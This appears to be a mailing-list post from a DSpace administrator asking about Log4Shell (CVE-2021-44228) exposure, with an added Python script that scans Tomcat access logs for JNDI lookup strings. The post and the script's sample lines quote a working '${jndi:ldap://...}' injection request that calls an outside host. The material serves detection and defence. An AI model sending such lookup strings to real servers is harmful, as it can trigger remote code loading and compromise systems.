Hi,
you might have recognized it since Friday: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

This affects millions of sites. This is "red alert" status by the Federal Office for Information Security of Germany.

We are still running a DSpace 5.10, which uses log4j in version 1.2.17 (and slf4j-log4j12-1.6.1?). On Friday, only versions > 2.0.0 <= 2.14.1 were known to be vulnerable; today also 1.x is sort of vulnerable, but not like 2.x.

I have already found a trace in the tomcat log:

GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 403 -

It is a 403, however a 404 would be nicer :). It was not found in the dspace.log; however, a helpful answer from someone with more in-depth knowledge of DSpace logging could save my holiday.

DSpace 7 contains log4j 2.13.3. Solr is already known to be vulnerable, but I cannot make any assumption about that based on how DSpace uses it - maybe a search with a string like {jndi:ldap://…} can trigger that.

CU
Michael
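
Added example, not part of the message above and not DSpace code: a Python script that scans Tomcat access-log lines for the `${jndi:` string quoted in the message, percent-decoding each line first and reporting the callback host and the HTTP status returned. The access-log layout (Tomcat's common/combined pattern), the function names, and every sample line other than the quoted request are assumptions.

```python
import re
from urllib.parse import unquote

# Literal lookup form from the post, matched after percent-decoding.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/}\s:]+)", re.I)
# Request line and status; assumes Tomcat's common/combined access-log pattern.
REQ_RE = re.compile(r'"[A-Z]+ \S+ HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample: line 2 carries the request quoted in the post; client
# addresses, timestamps, the /search path and the .invalid host are made up.
SAMPLE_LOG = [
    '192.0.2.7 - - [13/Dec/2021:09:58:01 +0100] "GET /xmlui/ HTTP/1.1" 200 18231',
    '192.0.2.10 - - [13/Dec/2021:10:15:32 +0100] "GET /$%7Bjndi:ldap://'
    'http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 403 -',
    '192.0.2.44 - - [13/Dec/2021:11:02:47 +0100] "GET /search?query=%24%7Bjndi'
    '%3Aldap%3A%2F%2Fscanner.example.invalid%2Fa%7D HTTP/1.1" 200 5120',
]

def decode_repeatedly(text, max_rounds=3):
    """Percent-decode until stable, so double-encoded input (%257B) is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_lines(lines):
    """Return one finding per line that contains a ${jndi:scheme://host lookup."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        match = JNDI_RE.search(decode_repeatedly(raw))
        if not match:
            continue
        req = REQ_RE.search(raw)  # status is read from the undecoded line
        findings.append({
            "line": lineno,
            "scheme": match.group("scheme").lower(),
            "callback_host": match.group("host"),
            "status": int(req.group("status")) if req else None,
        })
    return findings

if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG):
        print(finding)
```

The script matches only the literal `${jndi:` form shown in the message, so an empty result does not prove that no attempt was made.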